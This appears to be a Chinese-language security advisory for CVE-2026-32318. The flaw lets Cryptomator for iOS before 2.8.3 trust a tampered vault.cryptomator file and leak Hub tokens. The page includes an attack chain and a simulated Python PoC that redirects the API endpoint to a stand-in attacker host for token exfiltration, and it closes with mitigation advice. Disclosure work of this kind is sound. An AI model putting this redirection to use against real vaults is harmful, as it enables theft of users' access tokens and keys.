Cryptomator for iOS 配置文件完整性校验漏洞

漏洞信息

漏洞编号

CVE-2026-32318

漏洞类型

配置文件篡改

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Cryptomator for iOS

漏洞概述

Cryptomator for iOS 在 2.8.3 版本之前存在一个完整性检查漏洞，允许攻击者篡改加密库的配置文件。该漏洞可能导致 Hub 密钥加载机制中出现中间人攻击。在修复之前，客户端在未进行主机真实性检查的情况下，盲目信任配置文件中的端点。攻击者可以通过将合法的身份验证端点与恶意的 API 端点混合，从而窃取用户令牌。此问题影响在攻击者能够修改 vault.cryptomator 文件的环境中，使用受影响客户端版本解锁 Hub 支持的库的用户。该问题已在版本 2.8.3 中修复。

技术细节

该漏洞的核心在于 Cryptomator for iOS 客户端在处理 Hub 支持的加密库配置时，未对本地存储的 `vault.cryptomator` 文件实施严格的完整性验证机制。受影响版本在加载配置时，直接解析文件内容并信任其中定义的服务端点，缺乏对主机真实性的校验（如证书固定或签名验证）。

技术利用上，攻击者若具备对设备文件系统的低权限访问能力（或通过其他手段修改云同步文件），即可篡改 `vault.cryptomator`。攻击者会将配置中的 API 端点替换为恶意服务器地址，同时保留合法的身份验证端点以维持表面上的正常连接。当受害者尝试解锁加密库时（满足 UI:R 交互条件），客户端会根据被篡改的配置发起请求。由于缺乏完整性检查，客户端会将敏感的 Hub 密钥或认证令牌发送至攻击者控制的服务器，导致机密性泄露（C:H）。CVSS 3.1 评分为 7.6，反映了其网络攻击向量（AV:N）、低权限要求（PR:L）以及对机密性的严重影响。

攻击链分析

STEP 1

1. 初始访问

攻击者获取对受害者设备的低权限访问权限，或能够修改存储在云端的 vault.cryptomator 文件。

STEP 2

2. 配置篡改

攻击者修改 vault.cryptomator 文件，将其中的 'apiEndpoint' 替换为恶意服务器地址，保留 'authenticationEndpoint' 不变以绕过初步检查。

STEP 3

3. 触发漏洞

受害者打开 Cryptomator 应用并尝试解锁受影响的 Hub 加密库（满足用户交互要求）。

STEP 4

4. 数据窃取

客户端读取被篡改的配置，向恶意 API 端点发送请求，导致访问令牌或密钥被泄露给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import json
import os

# PoC: Demonstration of vault.cryptomator tampering
# This script simulates how an attacker might modify the configuration
# to redirect API traffic to a malicious endpoint for token exfiltration.

# Path to the target vault configuration file (hypothetical)
CONFIG_FILE = "vault.cryptomator"

# Original legitimate configuration structure (simplified for PoC)
original_config = {
    "vaultId": "12345678-1234-1234-1234-123456789abc",
    "cipherCombo": "SIV_GCM",
    "shorteningThreshold": 220,
    "hub": {
        "backendId": "s3",
        "authenticationEndpoint": "https://auth.cryptomator.cloud",
        "apiEndpoint": "https://api.cryptomator.cloud"  # Legitimate endpoint
    }
}

def tamper_with_config(file_path):
    """
    Simulates the tampering of the vault configuration file.
    It replaces the legitimate API endpoint with a malicious one.
    """
    print(f"[*] Reading configuration from {file_path}...")
    
    # In a real scenario, load the actual JSON file
    # with open(file_path, 'r') as f:
    #     config = json.load(f)
    config = original_config.copy()
    
    print("[+] Original API Endpoint:", config["hub"]["apiEndpoint"])
    
    # Define the malicious attacker-controlled endpoint
    malicious_endpoint = "https://evil-attacker-server.com/collect"
    
    # Tamper with the configuration
    config["hub"]["apiEndpoint"] = malicious_endpoint
    
    print(f"[!] Configuration tampered. New API Endpoint: {malicious_endpoint}")
    
    # Write the tampered config back (Simulated)
    # with open(file_path, 'w') as f:
    #     json.dump(config, f, indent=4)
    
    print("[+] Tampered configuration written back to disk.")
    print("[*] Next time the user unlocks the vault, tokens will be sent to the malicious endpoint.")

if __name__ == "__main__":
    # Check if file exists (simulation)
    if os.path.exists(CONFIG_FILE) or True: # forced True for demo
        tamper_with_config(CONFIG_FILE)
    else:
        print("[-] Vault configuration file not found.")

影响范围

Cryptomator for iOS < 2.8.3

防御指南

临时缓解措施

建议用户立即将 Cryptomator for iOS 更新至 2.8.3 或更高版本。在升级之前，请确保设备环境安全，避免在不信任的网络或设备上存储或解锁加密库，并检查本地配置文件是否被意外篡改。